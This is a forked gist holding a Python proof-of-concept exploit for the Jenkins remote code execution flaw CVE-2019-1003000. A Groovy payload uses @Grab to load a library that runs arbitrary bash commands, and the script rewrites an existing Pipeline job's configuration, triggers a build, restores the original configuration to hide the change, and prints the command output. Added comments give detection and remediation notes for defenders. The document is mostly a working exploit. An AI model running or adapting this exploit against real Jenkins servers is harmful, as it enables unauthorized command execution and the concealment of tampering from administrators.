Forked from adamyordan/CVE-2019-1003000-Jenkins-RCE-POC.py
Created
February 14, 2019 15:14
CVE-2019-1003000-Jenkins-RCE-POC
import argparse | |
import jenkins | |
import time | |
from xml.etree import ElementTree | |
# Groovy Pipeline script template that replaces the target job's
# `definition/script`; `%s` is filled in with the attacker-chosen command.
# The @Grab annotation makes Grape resolve and load the named artifact while
# the script is being compiled -- the step that the Script Security sandbox
# did not mediate (CVE-2019-1003000, as referenced by this gist's title) --
# and the loaded ProcBuilder class then runs the command via `/bin/bash -c`
# and prints its output into the build's console log.
# Defender notes: a `@Grab` annotation appearing in a job's stored config.xml
# (visible as a configuration change on the job) and a Pipeline build whose
# log contains raw shell output are the detection signals; the remedy is the
# patched Script Security / Pipeline plugins together with tight control of
# who holds Job/Configure and Job/Build on the controller.
payload = '''
import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy{ }
print new ProcBuilder("/bin/bash").withArgs("-c","%s").run().getOutputString()
'''
def run_command(url, cmd, job_name, username, password):
    """Rewrite an existing Pipeline job's script, build it, then restore it.

    Python 2 code (print statements). Walks the authenticated Jenkins REST
    API through python-jenkins: fetch the job's config.xml, swap the
    `definition/script` text for `payload % cmd`, push the new config,
    queue a build, wait for it to start, put the original config back, and
    dump the console log of the job's last build to stdout.

    Args:
        url: base URL of the Jenkins controller.
        cmd: shell command substituted into the Groovy payload.
        job_name: name of an existing Pipeline job the account may
            reconfigure and build.
        username / password: credentials passed to jenkins.Jenkins().

    Side effects on the target: two job reconfigurations (the malicious one
    and the restore) and one completed build whose record and console log
    stay on the controller -- those are the artifacts an incident responder
    should look for; the restore step only hides the change from the
    job's *current* configuration, not from its history.
    """
    print '[+] connecting to jenkins...'
    server = jenkins.Jenkins(url, username, password)
    print '[+] crafting payload...'
    # The original config.xml is kept so it can be written back after the
    # build has been triggered (see the restore step below).
    ori_job_config = server.get_job_config(job_name)
    et = ElementTree.fromstring(ori_job_config)
    # Assumes the job is a Pipeline job whose config carries a
    # definition/script element; for any other job type find() returns
    # None and this line raises AttributeError.
    et.find('definition/script').text = payload % cmd
    job_config = ElementTree.tostring(et, encoding='utf8', method='xml')
    print '[+] modifying job with payload...'
    # Requires Job/Configure on the target job.
    server.reconfig_job(job_name, job_config)
    time.sleep(3)
    print '[+] putting job build to queue...'
    # Requires Job/Build; the return value is the queue item id that is
    # polled below.
    queue_number = server.build_job(job_name)
    time.sleep(3)
    print '[+] waiting for job to build...'
    queue_item_info = {}
    # Poll the queue item until it reports an 'executable', i.e. the build
    # has left the queue and started.  There is no timeout: if the item
    # is cancelled or never scheduled this loop does not terminate.
    while 'executable' not in queue_item_info:
        queue_item_info = server.get_queue_item(queue_number)
        time.sleep(1)
    print '[+] restoring job...'
    # Second configuration change on the job -- the job is restored only
    # after the build has started, so the build itself still ran the
    # modified script.
    server.reconfig_job(job_name, ori_job_config)
    print '[+] fetching output...'
    # Presumes the build just started is now the job's lastBuild; a
    # concurrent build of the same job would make this pick the wrong one.
    last_build_number = server.get_job_info(job_name)['lastBuild']['number']
    console_output = server.get_build_console_output(job_name, last_build_number)
    print '[+] OUTPUT:'
    print console_output
# Command-line entry point: every option is optional at the argparse level,
# so a missing --url/--job surfaces later as an error from python-jenkins
# or ElementTree rather than as a usage message.  Credentials are taken
# on the command line and therefore land in shell history and process
# listings.
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Jenkins RCE')
    parser.add_argument('--url', help='target jenkins url')
    parser.add_argument('--cmd', help='system command to be run')
    parser.add_argument('--job', help='job name')
    parser.add_argument('--username', help='username')
    parser.add_argument('--password', help='password')
    args = parser.parse_args()
    run_command(args.url, args.cmd, args.job, args.username, args.password)